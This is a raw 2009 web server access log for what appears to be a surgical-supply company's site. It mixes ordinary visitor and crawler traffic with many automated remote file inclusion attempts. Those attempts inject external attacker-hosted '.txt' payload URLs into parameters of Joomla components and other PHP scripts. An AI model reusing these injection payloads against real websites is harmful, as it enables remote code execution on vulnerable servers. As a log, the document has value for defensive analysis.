67.19.130.218 - - [24/Jun/2009:00:44:46 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.19.130.218 - - [24/Jun/2009:00:44:46 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.19.130.218 - - [24/Jun/2009:00:44:51 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.153.28.140 - - [24/Jun/2009:00:44:55 -0400] "GET /logs/access_log.Q109051300%20%20/e404.php?DOCUMENT_ROOT=http://nashville.bbb.org///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.28.140 - - [24/Jun/2009:00:44:58 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://nashville.bbb.org///id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
186.136.187.88 - - [24/Jun/2009:00:45:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
186.136.187.88 - - [24/Jun/2009:00:45:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
186.136.187.88 - - [24/Jun/2009:00:45:57 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
186.136.187.88 - - [24/Jun/2009:00:45:57 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
123.143.98.5 - - [24/Jun/2009:00:46:30 -0400] "GET /logs/access_log.Q109051900//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [24/Jun/2009:00:46:30 -0400] "GET /logs/access_log.Q109051900//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.153.28.140 - - [24/Jun/2009:00:46:44 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://nashville.bbb.org///id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
122.153.28.140 - - [24/Jun/2009:00:46:44 -0400] "GET /e404.php?DOCUMENT_ROOT=http://nashville.bbb.org///id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
122.153.28.140 - - [24/Jun/2009:00:46:44 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://nashville.bbb.org///id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
122.153.28.140 - - [24/Jun/2009:00:46:57 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://nashville.bbb.org///id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:00:47:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [24/Jun/2009:00:47:33 -0400] "GET /logs/access_log.Q109060800%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.149.141.17 - - [24/Jun/2009:00:47:38 -0400] "GET //index2.php?page=http://snootyfoods.com/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
62.149.141.17 - - [24/Jun/2009:00:47:38 -0400] "GET /logs//index2.php?page=http://snootyfoods.com/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
62.149.141.17 - - [24/Jun/2009:00:47:38 -0400] "GET /logs/access_log.Q109051300%20%20//index2.php?page=http://snootyfoods.com/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.140.142.39 - - [24/Jun/2009:00:47:43 -0400] "GET /logs/access_log.Q109060800%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
195.34.78.110 - - [24/Jun/2009:00:47:47 -0400] "GET /logs/access_log.Q109060800%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
195.34.78.110 - - [24/Jun/2009:00:47:49 -0400] "GET /logs/access_log.Q109051200%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.19.130.218 - - [24/Jun/2009:00:47:50 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.19.130.218 - - [24/Jun/2009:00:47:52 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [24/Jun/2009:00:48:20 -0400] "GET /logs/access_log.Q109051200%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
201.232.54.48 - - [24/Jun/2009:00:48:24 -0400] "GET /logs/access_log.Q109051600//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pemai.ucoz.com/id_superscan.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
201.232.54.48 - - [24/Jun/2009:00:48:24 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pemai.ucoz.com/id_superscan.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
201.232.54.48 - - [24/Jun/2009:00:48:25 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pemai.ucoz.com/id_superscan.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
66.249.71.49 - - [24/Jun/2009:00:48:24 -0400] "GET /images/_notes/ HTTP/1.1" 200 15469 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.111.94.201 - - [24/Jun/2009:00:48:27 -0400] "GET /logs/access_log.Q109051500%20%20//skin/zero_vote/ask_password.php?dir=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:00:48:30 -0400] "GET /logs/access_log.Q109060400%20%20//skin/zero_vote/ask_password.php?dir=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.140.142.39 - - [24/Jun/2009:00:48:50 -0400] "GET /logs/access_log.Q109051900%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
110.45.144.106 - - [24/Jun/2009:00:49:21 -0400] "GET //admin.joomlaradiov5.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
110.45.144.106 - - [24/Jun/2009:00:49:21 -0400] "GET /logs//admin.joomlaradiov5.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.144.106 - - [24/Jun/2009:00:49:21 -0400] "GET /logs/access_log.Q109061400//admin.joomlaradiov5.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.144.106 - - [24/Jun/2009:00:50:11 -0400] "GET /logs/access_log.Q109051500//admin.joomlaradiov5.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.144.106 - - [24/Jun/2009:00:50:51 -0400] "GET /logs/access_log.Q109061400%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.144.106 - - [24/Jun/2009:00:50:57 -0400] "GET /logs/access_log.Q109051500%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
195.34.78.110 - - [24/Jun/2009:00:51:21 -0400] "GET /logs/access_log.Q109051900//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:00:52:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [24/Jun/2009:00:55:00 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pemai.ucoz.com/id_superscan.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
201.232.54.48 - - [24/Jun/2009:00:57:16 -0400] "GET /logs/access_log.Q109052500//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pemai.ucoz.com/id_superscan.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
209.59.12.99 - - [24/Jun/2009:00:57:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [24/Jun/2009:00:58:30 -0400] "GET ////administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pemai.ucoz.com/delta_test.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
201.232.54.48 - - [24/Jun/2009:00:58:30 -0400] "GET /logs////administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pemai.ucoz.com/delta_test.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.145.144.111 - - [24/Jun/2009:05:12:03 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; MSN Optimized;GB; MSN OptimizedIE8;ENGB)"
78.145.144.111 - - [24/Jun/2009:05:12:03 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; MSN Optimized;GB; MSN OptimizedIE8;ENGB)"
78.145.144.111 - - [24/Jun/2009:05:12:03 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; MSN Optimized;GB; MSN OptimizedIE8;ENGB)"
78.145.144.111 - - [24/Jun/2009:05:12:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; MSN Optimized;GB; MSN OptimizedIE8;ENGB)"
78.145.144.111 - - [24/Jun/2009:05:12:03 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; MSN Optimized;GB; MSN OptimizedIE8;ENGB)"
78.145.144.111 - - [24/Jun/2009:05:12:03 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; MSN Optimized;GB; MSN OptimizedIE8;ENGB)"
78.145.144.111 - - [24/Jun/2009:05:12:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; MSN Optimized;GB; MSN OptimizedIE8;ENGB)"
78.145.144.111 - - [24/Jun/2009:05:12:03 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; MSN Optimized;GB; MSN OptimizedIE8;ENGB)"
78.145.144.111 - - [24/Jun/2009:05:12:03 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; MSN Optimized;GB; MSN OptimizedIE8;ENGB)"
78.145.144.111 - - [24/Jun/2009:05:12:03 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; MSN Optimized;GB; MSN OptimizedIE8;ENGB)"
66.249.71.49 - - [24/Jun/2009:05:12:08 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01106D4713438400C4D0018+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.206.120.187 - - [24/Jun/2009:05:13:27 -0400] "GET /logs/_conpath/_zb_path?=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
211.206.120.187 - - [24/Jun/2009:05:13:27 -0400] "GET /_conpath/_zb_path?=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.206.120.187 - - [24/Jun/2009:05:13:28 -0400] "GET /logs/access_log.Q109051900/_conpath/_zb_path?=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:05:13:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
63.223.104.57 - - [24/Jun/2009:05:13:45 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
63.223.104.57 - - [24/Jun/2009:05:13:46 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
63.223.104.57 - - [24/Jun/2009:05:13:46 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
65.55.106.190 - - [24/Jun/2009:05:14:39 -0400] "GET /logs/access_log.Q108030500 HTTP/1.0" 404 224 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.94.80.27 - - [24/Jun/2009:05:14:53 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:14:53 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:14:53 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
63.223.104.57 - - [24/Jun/2009:05:14:54 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
69.94.80.27 - - [24/Jun/2009:05:14:56 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:14:56 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:14:56 -0400] "GET /logs/access_log.Q109052200%20%20//include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:15:00 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:15:03 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:14:55 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01106D471363A400CED0018+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.94.80.27 - - [24/Jun/2009:05:15:19 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:15:19 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:15:19 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:05:15:24 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:15:26 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:05:15:57 -0400] "GET /logs/access_log.Q109061800%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:05:15:57 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:05:15:57 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.198.73.59 - - [24/Jun/2009:05:16:12 -0400] "GET /logs/access_log.Q109061300%20%20///?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:16:15 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:16:15 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:16:15 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:05:16:18 -0400] "GET /logs/access_log.Q109061500%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
69.94.80.27 - - [24/Jun/2009:05:16:21 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
63.223.104.57 - - [24/Jun/2009:05:16:34 -0400] "GET /logs/access_log.Q109061400/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810"
63.223.104.57 - - [24/Jun/2009:05:16:34 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.810"
63.223.104.57 - - [24/Jun/2009:05:16:35 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
38.99.44.103 - - [24/Jun/2009:05:17:39 -0400] "GET /logs/access_log.Q107082400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.71.57 - - [24/Jun/2009:05:18:14 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
66.249.71.57 - - [24/Jun/2009:05:18:15 -0400] "GET /images/over-store_instr_section.jpg HTTP/1.1" 200 9238 "-" "Googlebot-Image/1.0"
216.17.99.13 - - [24/Jun/2009:05:18:17 -0400] "GET /logs/access_log.Q109051300%20%20///?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
216.17.99.13 - - [24/Jun/2009:05:18:17 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
216.17.99.13 - - [24/Jun/2009:05:18:17 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 6784 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:05:18:23 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:05:18:23 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:05:18:23 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:05:18:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.121.201.70 - - [24/Jun/2009:05:18:27 -0400] "GET /logs/send_reminders.php?includedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
116.121.201.70 - - [24/Jun/2009:05:18:27 -0400] "GET /logs/access_log.Q109060600/send_reminders.php?includedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
116.121.201.70 - - [24/Jun/2009:05:18:27 -0400] "GET /send_reminders.php?includedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:05:18:29 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:05:18:35 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:05:18:56 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:05:18:56 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:05:18:56 -0400] "GET //include/bbs.lib.inc.php?site_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
116.121.201.70 - - [24/Jun/2009:05:19:04 -0400] "GET /logs/access_log.Q109060600%20%20/send_reminders.php?includedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
134.58.253.57 - - [24/Jun/2009:05:19:09 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):02 HTTP/1.1" 200 516 "http://www.acesurgical.com/nuoss_collagen.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
134.58.253.57 - - [24/Jun/2009:05:19:18 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
84.232.4.1 - - [24/Jun/2009:05:19:23 -0400] "GET /logs/error_log.Q109051600/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do??? HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
84.232.4.1 - - [24/Jun/2009:05:19:23 -0400] "GET /logs/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do??? HTTP/1.1" 404 277 "-" "libwww-perl/5.803"
84.232.4.1 - - [24/Jun/2009:05:19:23 -0400] "GET /components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do??? HTTP/1.1" 404 272 "-" "libwww-perl/5.803"
